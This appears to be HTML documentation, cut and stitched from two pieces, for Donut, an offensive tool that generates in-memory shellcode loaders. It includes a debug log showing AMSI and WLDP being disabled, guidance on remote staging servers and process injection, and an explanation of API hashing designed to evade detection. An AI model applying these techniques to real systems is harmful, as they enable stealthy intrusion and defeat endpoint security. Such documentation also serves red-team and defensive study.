472 | DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start | |
473 | DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M") | |
474 | DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface | |
475 | DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes. | |
476 | DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer | |
477 | DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes. | |
478 | DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK | |
479 | DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK | |
480 | DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array | |
481 | DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3 | |
482 | DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000 | |
483 | DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory | |
484 | DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy | |
485 | DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance | |
486 | DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL | |
487 | DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass") | |
488 | DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess") | |
489 | DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2 | |
490 | DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s)) | |
491 | DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1 | |
492 | DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2 | |
493 | DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3 | |
494 | DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success | |
495 | DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release | |
496 | DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release | |
497 | DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release | |
498 | DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release | |
499 | DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop | |
500 | DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release | |
501 | DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release | |
502 | DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release | |
503 | DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance | |
504 | DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance | |
505 | </pre> | |
506 | ||
507 | <p>Obviously you should be cautious with what files you decide to execute on your machine.</p> | |
508 | ||
509 | </body> | |
510 | </html> |
0 | ||
1 | <html> | |
2 | <body> | |
3 | ||
4 | <h3>API</h3> | |
5 | ||
6 | <ul> | |
7 | <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li> | |
8 | <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li> | |
9 | </ul> | |
10 | ||
11 | <p>When provided with a valid configuration, <code>DonutCreate</code> will generate shellcode that executes a VBS/JS/EXE/DLL or XSL file in memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p> | |
12 | ||
13 | <ol> | |
14 | <li>An encrypted <var>Instance</var></li> | |
15 | <li>An encrypted <var>Module</var></li> | |
16 | <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li> | |
17 | </ol> | |
18 | ||
19 | <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p> | |
20 | ||
21 | <h3>Configuration</h3> | |
22 | ||
23 | <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p> | |
24 | ||
25 | <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span> | |
26 | <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span> | |
27 | <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span> | |
28 | <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span> | |
29 | <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span> | |
30 | <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span> | |
31 | <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span> | |
32 | <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span> | |
33 | <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span> | |
34 | <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span> | |
35 | ||
36 | <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span> | |
37 | uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span> | |
38 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span> | |
39 | ||
40 | <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span> | |
41 | uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span> | |
42 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span> | |
43 | ||
44 | uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span> | |
45 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span> | |
46 | <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span> | |
47 | </pre> | |
48 | ||
49 | <table border="1"> | |
50 | <tr> | |
51 | <th>Member</th> | |
52 | <th>Description</th> | |
53 | </tr> | |
54 | <tr> | |
55 | <td><code>arch</code></td> | |
56 | <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual mode, which combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td> | |
57 | </tr> | |
58 | <tr> | |
59 | <td><code>domain</code></td> | |
60 | <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td> | |
61 | </tr> | |
62 | <tr> | |
63 | <td><code>cls</code></td> | |
64 | <td>The name of the class containing the method to invoke. A namespace is optional, e.g. <var>namespace.class</var></td> | |
65 | </tr> | |
66 | <tr> | |
67 | <td><code>method</code></td> | |
68 | <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td> | |
69 | </tr> | |
70 | <tr> | |
71 | <td><code>param</code></td> | |
72 | <td>Contains a list of parameters for the .NET method or DLL function, each separated by a semi-colon or comma.</td> | |
73 | </tr> | |
74 | <tr> | |
75 | <td><code>file</code></td> | |
76 | <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td> | |
77 | </tr> | |
78 | <tr> | |
79 | <td><code>url</code></td> | |
80 | <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path where the module will be stored. e.g: https://www.rogueserver.com/modules/</td> | |
81 | </tr> | |
82 | <tr> | |
83 | <td><code>runtime</code></td> | |
84 | <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try to read it from the assembly's metadata header. If that fails, v4.0.30319 is used by default.</td> | |
85 | </tr> | |
86 | <tr> | |
87 | <td><code>modname</code></td> | |
88 | <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td> | |
89 | </tr> | |
90 | <tr> | |
91 | <td><code>mod_type</code></td> | |
92 | <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td> | |
93 | </tr> | |
94 | <tr> | |
95 | <td><code>mod_len</code></td> | |
96 | <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td> | |
97 | </tr> | |
98 | <tr> | |
99 | <td><code>mod</code></td> | |
100 | <td>Points to the encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to a file named <code>modname</code> and made accessible via an HTTP server.</td> | |
101 | </tr> | |
102 | <tr> | |
103 | <td><code>inst_type</code></td> | |
104 | <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td> | |
105 | </tr> | |
106 | <tr> | |
107 | <td><code>inst_len</code></td> | |
108 | <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td> | |
109 | </tr> | |
110 | <tr> | |
111 | <td><code>inst</code></td> | |
112 | <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td> | |
113 | </tr> | |
114 | <tr> | |
115 | <td><code>pic_len</code></td> | |
116 | <td>The size of data pointed to by <code>pic</code>.</td> | |
117 | </tr> | |
118 | <tr> | |
119 | <td><code>pic</code></td> | |
120 | <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td> | |
121 | </tr> | |
122 | </table> | |
123 | ||
124 | <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p> | |
125 | ||
126 | <h3>Instance</h3> | |
127 | ||
128 | <p>The position-independent code will always contain an <var>Instance</var>, which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check whether an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>. This check only confirms that the decryption key was correct; it does not authenticate the decrypted data.</p> | |
129 | ||
130 | <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span> | |
131 | <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span> | |
132 | uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span> | |
133 | DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span> | |
134 | ||
135 | uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span> | |
136 | ||
137 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
138 | uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span> | |
139 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span> | |
140 | <span style='color:#696969; '>// include prototypes only if header included from payload.h</span> | |
141 | <span style='color:#004a43; '>      </span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span> | |
142 | <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span> | |
143 | <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span> | |
144 | LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span> | |
145 | GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span> | |
146 | GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span> | |
147 | VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span> | |
148 | VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span> | |
149 | VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span> | |
150 | VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span> | |
151 | Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span> | |
152 | MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span> | |
153 | GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span> | |
154 | ||
155 | <span style='color:#696969; '>// imports from oleaut32.dll</span> | |
156 | SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span> | |
157 | SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span> | |
158 | SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span> | |
159 | SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span> | |
160 | SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span> | |
161 | SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span> | |
162 | SysAllocString_t SysAllocString<span style='color:#800080; '>;</span> | |
163 | SysFreeString_t SysFreeString<span style='color:#800080; '>;</span> | |
164 | LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span> | |
165 | ||
166 | <span style='color:#696969; '>// imports from wininet.dll</span> | |
167 | InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span> | |
168 | InternetOpen_t InternetOpen<span style='color:#800080; '>;</span> | |
169 | InternetConnect_t InternetConnect<span style='color:#800080; '>;</span> | |
170 | InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span> | |
171 | InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span> | |
172 | InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span> | |
173 | HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span> | |
174 | HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span> | |
175 | HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span> | |
176 | ||
177 | <span style='color:#696969; '>// imports from mscoree.dll</span> | |
178 | CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span> | |
179 | CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span> | |
180 | ||
181 | <span style='color:#696969; '>// imports from ole32.dll</span> | |
182 | CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span> | |
183 | CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span> | |
184 | CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span> | |
185 | <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span> | |
186 | <span style='color:#004a43; '>      </span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span> | |
187 | <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span> | |
188 | ||
189 | <span style='color:#696969; '>// everything from here is encrypted</span> | |
190 | <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of 64-bit API hashes required for instance to work</span> | |
191 | <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span> | |
192 | <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span> | |
193 | ||
194 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
195 | <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span> | |
196 | uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> | |
197 | <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span> | |
198 | ||
199 | <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span> | |
200 | <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span> | |
201 | <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span> | |
202 | <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span> | |
203 | ||
204 | <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span> | |
205 | <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span> | |
206 | <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span> | |
207 | ||
208 | uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span> | |
209 | uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span> | |
210 | ||
211 | <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span> | |
212 | <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span> | |
213 | ||
214 | <span style='color:#696969; '>// GUID required to load .NET assemblies</span> | |
215 | <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span> | |
216 | <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span> | |
217 | <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span> | |
218 | <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span> | |
219 | <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span> | |
220 | <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span> | |
221 | ||
222 | <span style='color:#696969; '>// GUID required to run VBS and JS files</span> | |
223 | <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span> | |
224 | <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span> | |
225 | <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span> | |
226 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span> | |
227 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span> | |
228 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span> | |
229 | ||
230 | <span style='color:#696969; '>// GUID required to run XSL files</span> | |
231 | <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span> | |
232 | <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span> | |
233 | <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span> | |
234 | ||
235 | <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span> | |
236 | ||
237 | <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span> | |
238 | <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span> | |
239 | <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span> | |
240 | <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span> | |
241 | ||
242 | uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span> | |
243 | uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span> | |
244 | ||
245 | DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span> | |
246 | uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span> | |
247 | ||
248 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
249 | PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span> | |
250 | DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span> | |
251 | <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span> | |
252 | <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span> | |
253 | </pre> | |
254 | ||
255 | <h3>Module</h3> | |
256 | ||
257 | <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p> | |
258 | ||
259 | <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span> | |
260 | <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span> | |
261 | <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span> | |
262 | <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span> | |
263 | <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span> | |
264 | <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span> | |
265 | <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span> | |
266 | <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span> | |
267 | <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span> | |
268 | <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span> | |
269 | ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span> | |
270 | ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span> | |
271 | <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span> | |
272 | <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span> | |
273 | </pre> | |
274 | ||
275 | <h3>API Hashing</h3> | |
276 | ||
277 | <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p> | |
278 | ||
279 | <h3>Encryption</h3> | |
280 | ||
281 | <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p> | |
282 | ||
283 | <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span> | |
284 | <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span> | |
285 | <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span> | |
